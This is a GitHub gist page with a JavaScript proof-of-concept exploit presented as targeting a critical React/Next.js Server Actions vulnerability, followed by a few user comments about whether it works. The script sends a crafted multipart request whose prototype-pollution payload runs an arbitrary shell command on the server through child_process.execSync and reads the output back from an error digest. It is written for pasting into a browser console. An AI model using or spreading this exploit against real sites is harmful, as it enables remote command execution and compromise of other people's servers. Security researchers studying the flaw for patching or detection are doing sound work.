Created
December 16, 2025 05:01
-
-
Save akshaymarch7/1da1558d1a1a04e29ae50d0de7a360ad to your computer and use it in GitHub Desktop.
React Critical Vulnerability (CVSS 10.0) - exploit1 code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const cmd = "touch iWasHere"; // The command you want to run | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`; | |
| const boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"; | |
| // 2. Build the multipart/form-data body manually | |
| const bodyParts = [ | |
| `--${boundary}`, | |
| 'Content-Disposition: form-data; name="0"', | |
| '', | |
| payloadJson, | |
| `--${boundary}`, | |
| 'Content-Disposition: form-data; name="1"', | |
| '', | |
| '"$@0"', | |
| `--${boundary}`, | |
| 'Content-Disposition: form-data; name="2"', | |
| '', | |
| '[]', | |
| `--${boundary}--`, | |
| '' | |
| ].join('\r\n'); | |
| try { | |
| // 3. Send the request | |
| const res = await fetch(targetUrl, { | |
| method: 'POST', | |
| headers: { | |
| 'Next-Action': 'x', // Required to trigger Server Action logic | |
| 'X-Nextjs-Request-Id': '7a3f9c1e', | |
| 'X-Nextjs-Html-Request-ld': '9bK2mPaRtVwXyZ3S@!sT7u', | |
| 'Content-Type': `multipart/form-data; boundary=${boundary}`, | |
| 'X-Nextjs-Html-Request-Id': 'SSTMXm7OJ_g0Ncx6jpQt9' | |
| }, | |
| body: bodyParts | |
| }); | |
| const responseText = await res.text(); | |
| // 4. Extract and Decode the output | |
| // The server returns the output inside the "digest" field of the error | |
| const digestMatch = responseText.match(/"digest"\s*:\s*"((?:[^"\\]|\\.)*)"/); | |
| if (digestMatch && digestMatch[1]) { | |
| let rawBase64 = digestMatch[1]; | |
| // Clean JSON escaping | |
| let cleanBase64 = JSON.parse(`"${rawBase64}"`); | |
| // Decode Base64 (handling UTF-8 correctly) | |
| const decodedStr = new TextDecoder().decode( | |
| Uint8Array.from(atob(cleanBase64), c => c.charCodeAt(0)) | |
| ); | |
| console.log("%c[+] Exploit Successful!", "color: green; font-weight: bold; font-size: 14px;"); | |
| console.log("Command Output:\n----------------\n" + decodedStr + "\n----------------"); | |
| } else { | |
| console.log("%c[-] Exploit Failed", "color: red; font-weight: bold;"); | |
| console.log("Could not find 'digest' in response. Raw response preview:", responseText.substring(0, 200)); | |
| } | |
| } catch (e) { | |
| console.error("Request Error:", e); | |
| } | |
| })(); |
it cannot exploit my nextjs 10.8.2
that is true,
thanks for sharing.
Requesting to change cmd to something readonly like "ls" so, anyone copy pasting don't accidentally create a file in server.
why mine is saying like
-] Exploit Failed [debugger eval code:66:21](chrome://devtools/content/webconsole/debugger%20eval%20code)
Could not find 'digest' in response. Raw response preview: <empty string> [debugger eval code:67:21](chrome://devtools/content/webconsole/debugger%20eval%20code)
@muhammadyaqoobmuet Did you change the targetUrl to your desired domain ?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
it cannot exploit my nextjs 10.8.2